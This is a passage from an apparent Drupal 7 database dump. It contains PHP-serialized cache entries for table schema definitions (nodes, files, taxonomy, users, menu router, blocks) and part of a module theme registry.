keys\";a:2:{s:14:\"versioned_node\";a:2:{s:5:\"table\";s:4:\"node\";s:7:\"columns\";a:1:{s:3:\"nid\";s:3:\"nid\";}}s:14:\"version_author\";a:2:{s:5:\"table\";s:5:\"users\";s:7:\"columns\";a:1:{s:3:\"uid\";s:3:\"uid\";}}}s:6:\"module\";s:4:\"node\";s:4:\"name\";s:13:\"node_revision\";}s:12:\"file_managed\";a:7:{s:6:\"fields\";a:8:{s:3:\"fid\";a:3:{s:4:\"type\";s:6:\"serial\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;}s:3:\"uid\";a:4:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:8:\"filename\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:3:\"uri\";a:5:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";s:6:\"binary\";b:1;}s:8:\"filemime\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:8:\"filesize\";a:5:{s:4:\"type\";s:3:\"int\";s:4:\"size\";s:3:\"big\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:6:\"status\";a:4:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;s:4:\"size\";s:4:\"tiny\";}s:9:\"timestamp\";a:4:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;s:7:\"default\";i:0;}}s:7:\"indexes\";a:3:{s:3:\"uid\";a:1:{i:0;s:3:\"uid\";}s:6:\"status\";a:1:{i:0;s:6:\"status\";}s:9:\"timestamp\";a:1:{i:0;s:9:\"timestamp\";}}s:11:\"unique keys\";a:1:{s:3:\"uri\";a:1:{i:0;s:3:\"uri\";}}s:11:\"primary key\";a:1:{i:0;s:3:\"fid\";}s:12:\"foreign keys\";a:1:{s:10:\"file_owner\";a:2:{s:5:\"table\";s:5:\"users\";s:7:\"columns\";a:1:{s:3:\"uid\";s:3:\"uid\";}}}s:6:\"module\";s:6:\"system\";s:4:\"name\";s:12:\"file_managed\";}s:18:\"taxonomy_term_data\";a:6:{s:6:\"fields\";a:6:{s:3:\"tid\";a:3:{s:4:\"type\";s:6:\"serial\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;}s:3:\"vid\";a:4:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:4:\"name\";a:5:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";s:12:\"translatable\";b:1;}s:11:\"description\";a:4:{s:4:\"type\";s:4:\"text\";s:8:\"not null\";b:0;s:4:\"size\";s:3:\"big\";s:12:\"translatable\";b:1;}s:6:\"format\";a:3:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:0;}s:6:\"weight\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}}s:11:\"primary key\";a:1:{i:0;s:3:\"tid\";}s:12:\"foreign keys\";a:1:{s:10:\"vocabulary\";a:2:{s:5:\"table\";s:19:\"taxonomy_vocabulary\";s:7:\"columns\";a:1:{s:3:\"vid\";s:3:\"vid\";}}}s:7:\"indexes\";a:3:{s:13:\"taxonomy_tree\";a:3:{i:0;s:3:\"vid\";i:1;s:6:\"weight\";i:2;s:4:\"name\";}s:8:\"vid_name\";a:2:{i:0;s:3:\"vid\";i:1;s:4:\"name\";}s:4:\"name\";a:1:{i:0;s:4:\"name\";}}s:6:\"module\";s:8:\"taxonomy\";s:4:\"name\";s:18:\"taxonomy_term_data\";}s:19:\"taxonomy_vocabulary\";a:6:{s:6:\"fields\";a:7:{s:3:\"vid\";a:3:{s:4:\"type\";s:6:\"serial\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;}s:4:\"name\";a:5:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";s:12:\"translatable\";b:1;}s:12:\"machine_name\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:11:\"description\";a:4:{s:4:\"type\";s:4:\"text\";s:8:\"not null\";b:0;s:4:\"size\";s:3:\"big\";s:12:\"translatable\";b:1;}s:9:\"hierarchy\";a:5:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;s:7:\"default\";i:0;s:4:\"size\";s:4:\"tiny\";}s:6:\"module\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:6:\"weight\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}}s:11:\"primary key\";a:1:{i:0;s:3:\"vid\";}s:7:\"indexes\";a:1:{s:4:\"list\";a:2:{i:0;s:6:\"weight\";i:1;s:4:\"name\";}}s:11:\"unique keys\";a:1:{s:12:\"machine_name\";a:1:{i:0;s:12:\"machine_name\";}}s:6:\"module\";s:8:\"taxonomy\";s:4:\"name\";s:19:\"taxonomy_vocabulary\";}s:5:\"users\";a:7:{s:6:\"fields\";a:16:{s:3:\"uid\";a:4:{s:4:\"type\";s:3:\"int\";s:8:\"unsigned\";b:1;s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:4:\"name\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:60;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:4:\"pass\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:128;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:4:\"mail\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:254;s:8:\"not null\";b:0;s:7:\"default\";s:0:\"\";}s:5:\"theme\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:9:\"signature\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:16:\"signature_format\";a:3:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:0;}s:7:\"created\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:6:\"access\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:5:\"login\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:6:\"status\";a:4:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;s:4:\"size\";s:4:\"tiny\";}s:8:\"timezone\";a:3:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:32;s:8:\"not null\";b:0;}s:8:\"language\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:12;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:7:\"picture\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:4:\"init\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:254;s:8:\"not null\";b:0;s:7:\"default\";s:0:\"\";}s:4:\"data\";a:4:{s:4:\"type\";s:4:\"blob\";s:8:\"not null\";b:0;s:4:\"size\";s:3:\"big\";s:9:\"serialize\";b:1;}}s:7:\"indexes\";a:4:{s:6:\"access\";a:1:{i:0;s:6:\"access\";}s:7:\"created\";a:1:{i:0;s:7:\"created\";}s:4:\"mail\";a:1:{i:0;s:4:\"mail\";}s:7:\"picture\";a:1:{i:0;s:7:\"picture\";}}s:11:\"unique keys\";a:1:{s:4:\"name\";a:1:{i:0;s:4:\"name\";}}s:11:\"primary key\";a:1:{i:0;s:3:\"uid\";}s:12:\"foreign keys\";a:1:{s:16:\"signature_format\";a:2:{s:5:\"table\";s:13:\"filter_format\";s:7:\"columns\";a:1:{s:16:\"signature_format\";s:6:\"format\";}}}s:6:\"module\";s:4:\"user\";s:4:\"name\";s:5:\"users\";}s:11:\"menu_router\";a:5:{s:6:\"fields\";a:23:{s:4:\"path\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:14:\"load_functions\";a:2:{s:4:\"type\";s:4:\"blob\";s:8:\"not null\";b:1;}s:16:\"to_arg_functions\";a:2:{s:4:\"type\";s:4:\"blob\";s:8:\"not null\";b:1;}s:15:\"access_callback\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:16:\"access_arguments\";a:2:{s:4:\"type\";s:4:\"blob\";s:8:\"not null\";b:0;}s:13:\"page_callback\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:14:\"page_arguments\";a:2:{s:4:\"type\";s:4:\"blob\";s:8:\"not null\";b:0;}s:17:\"delivery_callback\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:3:\"fit\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:12:\"number_parts\";a:4:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;s:4:\"size\";s:5:\"small\";}s:7:\"context\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:10:\"tab_parent\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:8:\"tab_root\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:5:\"title\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:14:\"title_callback\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:15:\"title_arguments\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:14:\"theme_callback\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:15:\"theme_arguments\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:4:\"type\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:11:\"description\";a:2:{s:4:\"type\";s:4:\"text\";s:8:\"not null\";b:1;}s:8:\"position\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:6:\"weight\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:12:\"include_file\";a:2:{s:4:\"type\";s:4:\"text\";s:4:\"size\";s:6:\"medium\";}}s:7:\"indexes\";a:3:{s:3:\"fit\";a:1:{i:0;s:3:\"fit\";}s:10:\"tab_parent\";a:3:{i:0;a:2:{i:0;s:10:\"tab_parent\";i:1;i:64;}i:1;s:6:\"weight\";i:2;s:5:\"title\";}s:21:\"tab_root_weight_title\";a:3:{i:0;a:2:{i:0;s:8:\"tab_root\";i:1;i:64;}i:1;s:6:\"weight\";i:2;s:5:\"title\";}}s:11:\"primary key\";a:1:{i:0;s:4:\"path\";}s:6:\"module\";s:6:\"system\";s:4:\"name\";s:11:\"menu_router\";}s:16:\"date_format_type\";a:5:{s:6:\"fields\";a:3:{s:4:\"type\";a:3:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:64;s:8:\"not null\";b:1;}s:5:\"title\";a:3:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;}s:6:\"locked\";a:4:{s:4:\"type\";s:3:\"int\";s:4:\"size\";s:4:\"tiny\";s:7:\"default\";i:0;s:8:\"not null\";b:1;}}s:11:\"primary key\";a:1:{i:0;s:4:\"type\";}s:7:\"indexes\";a:1:{s:5:\"title\";a:1:{i:0;s:5:\"title\";}}s:6:\"module\";s:6:\"system\";s:4:\"name\";s:16:\"date_format_type\";}s:12:\"date_formats\";a:5:{s:6:\"fields\";a:4:{s:4:\"dfid\";a:3:{s:4:\"type\";s:6:\"serial\";s:8:\"not null\";b:1;s:8:\"unsigned\";b:1;}s:6:\"format\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:100;s:8:\"not null\";b:1;s:6:\"binary\";b:1;}s:4:\"type\";a:3:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:64;s:8:\"not null\";b:1;}s:6:\"locked\";a:4:{s:4:\"type\";s:3:\"int\";s:4:\"size\";s:4:\"tiny\";s:7:\"default\";i:0;s:8:\"not null\";b:1;}}s:11:\"primary key\";a:1:{i:0;s:4:\"dfid\";}s:11:\"unique keys\";a:1:{s:7:\"formats\";a:2:{i:0;s:6:\"format\";i:1;s:4:\"type\";}}s:6:\"module\";s:6:\"system\";s:4:\"name\";s:12:\"date_formats\";}s:5:\"block\";a:6:{s:6:\"fields\";a:12:{s:3:\"bid\";a:2:{s:4:\"type\";s:6:\"serial\";s:8:\"not null\";b:1;}s:6:\"module\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:64;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:5:\"delta\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:32;s:8:\"not null\";b:1;s:7:\"default\";s:1:\"0\";}s:5:\"theme\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:64;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:6:\"status\";a:4:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;s:4:\"size\";s:4:\"tiny\";}s:6:\"weight\";a:3:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;}s:6:\"region\";a:4:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:64;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";}s:6:\"custom\";a:4:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;s:4:\"size\";s:4:\"tiny\";}s:10:\"visibility\";a:4:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:0;s:4:\"size\";s:4:\"tiny\";}s:5:\"pages\";a:2:{s:4:\"type\";s:4:\"text\";s:8:\"not null\";b:1;}s:5:\"title\";a:5:{s:4:\"type\";s:7:\"varchar\";s:6:\"length\";i:255;s:8:\"not null\";b:1;s:7:\"default\";s:0:\"\";s:12:\"translatable\";b:1;}s:5:\"cache\";a:4:{s:4:\"type\";s:3:\"int\";s:8:\"not null\";b:1;s:7:\"default\";i:1;s:4:\"size\";s:4:\"tiny\";}}s:11:\"primary key\";a:1:{i:0;s:3:\"bid\";}s:11:\"unique keys\";a:1:{s:3:\"tmd\";a:3:{i:0;s:5:\"theme\";i:1;s:6:\"module\";i:2;s:5:\"delta\";}}s:7:\"indexes\";a:1:{s:4:\"list\";a:5:{i:0;s:5:\"theme\";i:1;s:6:\"status\";i:2;s:6:\"region\";i:3;s:6:\"weight\";i:4;s:6:\"module\";}}s:6:\"module\";s:5:\"block\";s:4:\"name\";s:5:\"block\";}}',0,1447873189,1),('theme_registry:build:modules','a:154:{s:12:\"user_picture\";a:6:{s:9:\"variables\";a:1:{s:7:\"account\";N;}s:8:\"template\";s:25:\"modules/user/user-picture\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:12:\"modules/user\";s:20:\"preprocess functions\";a:3:{i:0;s:19:\"template_preprocess\";i:1;s:32:\"template_preprocess_user_picture\";i:2;s:21:\"contextual_preprocess\";}s:17:\"process functions\";a:2:{i:0;s:16:\"template_process\";i:1;s:11:\"rdf_process\";}}s:12:\"user_profile\";a:8:{s:14:\"render element\";s:8:\"elements\";s:8:\"template\";s:25:\"modules/user/user-profile\";s:4:\"file\";s:14:\"user.pages.inc\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:12:\"modules/user\";s:8:\"includes\";a:1:{i:0;s:27:\"modules/user/user.pages.inc\";}s:20:\"preprocess functions\";a:4:{i:0;s:19:\"template_preprocess\";i:1;s:32:\"template_preprocess_user_profile\";i:2;s:21:\"contextual_preprocess\";i:3;s:27:\"rdf_preprocess_user_profile\";}s:17:\"process functions\";a:2:{i:0;s:16:\"template_process\";i:1;s:11:\"rdf_process\";}}s:21:\"user_profile_category\";a:8:{s:14:\"render element\";s:7:\"element\";s:8:\"template\";s:34:\"modules/user/user-profile-category\";s:4:\"file\";s:14:\"user.pages.inc\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:12:\"modules/user\";s:8:\"includes\";a:1:{i:0;s:27:\"modules/user/user.pages.inc\";}s:20:\"preprocess functions\";a:3:{i:0;s:19:\"template_preprocess\";i:1;s:41:\"template_preprocess_user_profile_category\";i:2;s:21:\"contextual_preprocess\";}s:17:\"process functions\";a:2:{i:0;s:16:\"template_process\";i:1;s:11:\"rdf_process\";}}s:17:\"user_profile_item\";a:8:{s:14:\"render element\";s:7:\"element\";s:8:\"template\";s:30:\"modules/user/user-profile-item\";s:4:\"file\";s:14:\"user.pages.inc\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:12:\"modules/user\";s:8:\"includes\";a:1:{i:0;s:27:\"modules/user/user.pages.inc\";}s:20:\"preprocess functions\";a:3:{i:0;s:19:\"template_preprocess\";i:1;s:37:\"template_preprocess_user_profile_item\";i:2;s:21:\"contextual_preprocess\";}s:17:\"process functions\";a:2:{i:0;s:16:\"template_process\";i:1;s:11:\"rdf_process\";}}s:9:\"user_list\";a:6:{s:9:\"variables\";a:2:{s:5:\"users\";N;s:5:\"title\";N;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:12:\"modules/user\";s:8:\"function\";s:15:\"theme_user_list\";s:20:\"preprocess functions\";a:0:{}s:17:\"process functions\";a:0:{}}s:22:\"user_admin_permissions\";a:8:{s:14:\"render element\";s:4:\"form\";s:4:\"file\";s:14:\"user.admin.inc\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:12:\"modules/user\";s:8:\"function\";s:28:\"theme_user_admin_permissions\";s:8:\"includes\";a:1:{i:0;s:27:\"modules/user/user.admin.inc\";}s:20:\"preprocess functions\";a:0:{}s:17:\"process functions\";a:0:{}}s:16:\"user_admin_roles\";a:8:{s:14:\"render element\";s:4:\"form\";s:4:\"file\";s:14:\"user.admin.inc\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:12:\"modules/user\";s:8:\"function\";s:22:\"theme_user_admin_roles\";s:8:\"includes\";a:1:{i:0;s:27:\"modules/user/user.admin.inc\";}s:20:\"preprocess functions\";a:0:{}s:17:\"process functions\";a:0:{}}s:27:\"user_permission_description\";a:8:{s:9:\"variables\";a:2:{s:15:\"permission_item\";N;s:4:\"hide\";N;}s:4:\"file\";s:14:\"user.admin.inc\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:12:\"modules/user\";s:8:\"function\";s:33:\"theme_user_permission_description\";s:8:\"includes\";a:1:{i:0;s:27:\"modules/user/user.admin.inc\";}s:20:\"preprocess functions\";a:0:{}s:17:\"process functions\";a:0:{}}s:14:\"user_signature\";a:6:{s:9:\"variables\";a:1:{s:9:\"signature\";N;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:12:\"modules/user\";s:8:\"function\";s:20:\"theme_user_signature\";s:20:\"preprocess functions\";a:0:{}s:17:\"process functions\";a:0:{}}s:26:\"update_manager_update_form\";a:8:{s:14:\"render element\";s:4:\"form\";s:4:\"file\";s:18:\"update.manager.inc\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/update\";s:8:\"function\";s:32:\"theme_update_manager_update_form\";s:8:\"includes\";a:1:{i:0;s:33:\"modules/update/update.manager.inc\";}s:20:\"preprocess functions\";a:0:{}s:17:\"process functions\";a:0:{}}s:17:\"update_last_check\";a:6:{s:9:\"variables\";a:1:{s:4:\"last\";N;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/update\";s:8:\"function\";s:23:\"theme_update_last_check\";s:20:\"preprocess functions\";a:0:{}s:17:\"process functions\";a:0:{}}s:13:\"update_report\";a:8:{s:9:\"variables\";a:1:{s:4:\"data\";N;}s:4:\"file\";s:17:\"update.report.inc\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/update\";s:8:\"function\";s:19:\"theme_update_report\";s:8:\"includes\";a:1:{i:0;s:32:\"modules/update/update.report.inc\";}s:20:\"preprocess functions\";a:0:{}s:17:\"process functions\";a:0:{}}s:14:\"update_version\";a:8:{s:9:\"variables\";a:3:{s:7:\"version\";N;s:3:\"tag\";N;s:5:\"class\";a:0:{}}s:4:\"file\";s:17:\"update.report.inc\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/update\";s:8:\"function\";s:20:\"theme_update_version\";s:8:\"includes\";a:1:{i:0;s:32:\"modules/update/update.report.inc\";}s:20:\"preprocess functions\";a:0:{}s:17:\"process functions\";a:0:{}}s:19:\"update_status_label\";a:8:{s:9:\"variables\";a:1:{s:6:\"status\";N;}s:4:\"file\";s:17:\"update.report.inc\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/update\";s:8:\"function\";s:25:\"theme_update_status_label\";s:8:\"includes\";a:1:{i:0;s:32:\"modules/update/update.report.inc\";}s:20:\"preprocess functions\";a:0:{}s:17:\"process functions\";a:0:{}}s:7:\"toolbar\";a:7:{s:14:\"render element\";s:7:\"toolbar\";s:8:\"template\";s:7:\"toolbar\";s:4:\"path\";s:15:\"modules/toolbar\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:15:\"modules/toolbar\";s:20:\"preprocess functions\";a:3:{i:0;s:19:\"template_preprocess\";i:1;s:21:\"contextual_preprocess\";i:2;s:26:\"toolbar_preprocess_toolbar\";}s:17:\"process functions\";a:2:{i:0;s:16:\"template_process\";i:1;s:11:\"rdf_process\";}}s:14:\"toolbar_toggle\";a:6:{s:9:\"variables\";a:2:{s:9:\"collapsed\";N;s:10:\"attributes\";a:0:{}}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:15:\"modules/toolbar\";s:8:\"function\";s:20:\"theme_toolbar_toggle\";s:20:\"preprocess functions\";a:0:{}s:17:\"process functions\";a:0:{}}s:30:\"taxonomy_overview_vocabularies\";a:6:{s:14:\"render element\";s:4:\"form\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:16:\"modules/taxonomy\";s:8:\"function\";s:36:\"theme_taxonomy_overview_vocabularies\";s:20:\"preprocess functions\";a:0:{}s:17:\"process functions\";a:0:{}}s:23:\"taxonomy_overview_terms\";a:6:{s:14:\"render element\";s:4:\"form\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:16:\"modules/taxonomy\";s:8:\"function\";s:29:\"theme_taxonomy_overview_terms\";s:20:\"preprocess functions\";a:0:{}s:17:\"process functions\";a:0:{}}s:13:\"taxonomy_term\";a:6:{s:14:\"render element\";s:8:\"elements\";s:8:\"template\";s:30:\"modules/taxonomy/taxonomy-term\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:16:\"modules/taxonomy\";s:20:\"preprocess functions\";a:4:{i:0;s:19:\"template_preprocess\";i:1;s:33:\"template_preprocess_taxonomy_term\";i:2;s:21:\"contextual_preprocess\";i:3;s:28:\"rdf_preprocess_taxonomy_term\";}s:17:\"process functions\";a:2:{i:0;s:16:\"template_process\";i:1;s:11:\"rdf_process\";}}s:4:\"html\";a:6:{s:14:\"render element\";s:4:\"page\";s:8:\"template\";s:19:\"modules/system/html\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:20:\"preprocess functions\";a:5:{i:0;s:19:\"template_preprocess\";i:1;s:24:\"template_preprocess_html\";i:2;s:21:\"contextual_preprocess\";i:3;s:23:\"overlay_preprocess_html\";i:4;s:23:\"toolbar_preprocess_html\";}s:17:\"process functions\";a:3:{i:0;s:16:\"template_process\";i:1;s:21:\"template_process_html\";i:2;s:11:\"rdf_process\";}}s:4:\"page\";a:6:{s:14:\"render element\";s:4:\"page\";s:8:\"template\";s:19:\"modules/system/page\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:20:\"preprocess functions\";a:5:{i:0;s:19:\"template_preprocess\";i:1;s:24:\"template_preprocess_page\";i:2;s:21:\"contextual_preprocess\";i:3;s:23:\"overlay_preprocess_page\";i:4;s:24:\"shortcut_preprocess_page\";}s:17:\"process functions\";a:3:{i:0;s:16:\"template_process\";i:1;s:21:\"template_process_page\";i:2;s:11:\"rdf_process\";}}s:6:\"region\";a:6:{s:14:\"render element\";s:8:\"elements\";s:8:\"template\";s:21:\"modules/system/region\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:20:\"preprocess functions\";a:3:{i:0;s:19:\"template_preprocess\";i:1;s:26:\"template_preprocess_region\";i:2;s:21:\"contextual_preprocess\";}s:17:\"process functions\";a:2:{i:0;s:16:\"template_process\";i:1;s:11:\"rdf_process\";}}s:15:\"status_messages\";a:6:{s:9:\"variables\";a:1:{s:7:\"display\";N;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:21:\"theme_status_messages\";s:20:\"preprocess functions\";a:0:{}s:17:\"process functions\";a:0:{}}s:4:\"link\";a:6:{s:9:\"variables\";a:3:{s:4:\"text\";N;s:4:\"path\";N;s:7:\"options\";a:0:{}}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:10:\"theme_link\";s:20:\"preprocess functions\";a:0:{}s:17:\"process functions\";a:0:{}}s:5:\"links\";a:6:{s:9:\"variables\";a:3:{s:5:\"links\";N;s:10:\"attributes\";a:1:{s:5:\"class\";a:1:{i:0;s:5:\"links\";}}s:7:\"heading\";a:0:{}}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:11:\"theme_links\";s:20:\"preprocess functions\";a:0:{}s:17:\"process functions\";a:0:{}}s:5:\"image\";a:6:{s:9:\"variables\";a:6:{s:4:\"path\";N;s:5:\"width\";N;s:6:\"height\";N;s:3:\"alt\";s:0:\"\";s:5:\"title\";N;s:10:\"attributes\";a:0:{}}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:11:\"theme_image\";s:20:\"preprocess functions\";a:1:{i:0;s:20:\"rdf_preprocess_image\";}s:17:\"process functions\";a:0:{}}s:10:\"breadcrumb\";a:6:{s:9:\"variables\";a:1:{s:10:\"breadcrumb\";N;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:16:\"theme_breadcrumb\";s:20:\"preprocess functions\";a:0:{}s:17:\"process functions\";a:0:{}}s:4:\"help\";a:6:{s:9:\"variables\";a:0:{}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:10:\"theme_help\";s:20:\"preprocess functions\";a:0:{}s:17:\"process functions\";a:0:{}}s:5:\"table\";a:6:{s:9:\"variables\";a:7:{s:6:\"header\";N;s:4:\"rows\";N;s:10:\"attributes\";a:0:{}s:7:\"caption\";N;s:9:\"colgroups\";a:0:{}s:6:\"sticky\";b:1;s:5:\"empty\";s:0:\"\";}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:11:\"theme_table\";s:20:\"preprocess functions\";a:0:{}s:17:\"process functions\";a:0:{}}s:19:\"tablesort_indicator\";a:6:{s:9:\"variables\";a:1:{s:5:\"style\";N;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:25:\"theme_tablesort_indicator\";s:20:\"preprocess functions\";a:0:{}s:17:\"process functions\";a:0:{}}s:4:\"mark\";a:6:{s:9:\"variables\";a:1:{s:4:\"type\";i:1;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:10:\"theme_mark\";s:20:\"preprocess functions\";a:0:{}s:17:\"process functions\";a:0:{}}s:9:\"item_list\";a:6:{s:9:\"variables\";a:4:{s:5:\"items\";a:0:{}s:5:\"title\";N;s:4:\"type\";s:2:\"ul\";s:10:\"attributes\";a:0:{}}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:15:\"theme_item_list\";s:20:\"preprocess 